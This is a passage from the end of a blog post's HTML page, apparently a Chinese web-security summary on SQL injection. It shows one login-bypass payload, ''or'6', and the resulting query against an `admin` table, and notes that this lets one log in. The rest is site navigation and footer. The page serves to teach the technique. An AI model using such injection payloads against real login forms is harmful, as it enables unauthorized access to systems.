那么语句就会变成<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"select * from `admin` where password=''or'6'" </span><br></pre></td></tr></table></figure></p>
<p>这样就能登录啦</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Summary/" rel="tag"># Summary</a>
              <a href="/tags/Web/" rel="tag"># Web</a>
              <a href="/tags/SQL/" rel="tag"># SQL</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/09/26/Williams-s-p-1-algorithm/" rel="prev" title="Williams's p+1 algorithm">
                  <i class="fa fa-angle-left"></i> Williams's p+1 algorithm
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/10/10/cryptopals/" rel="next" title="cryptopals">
                  cryptopals <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">K1rit0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="Word count total">350k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">5:18</span>
  </span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
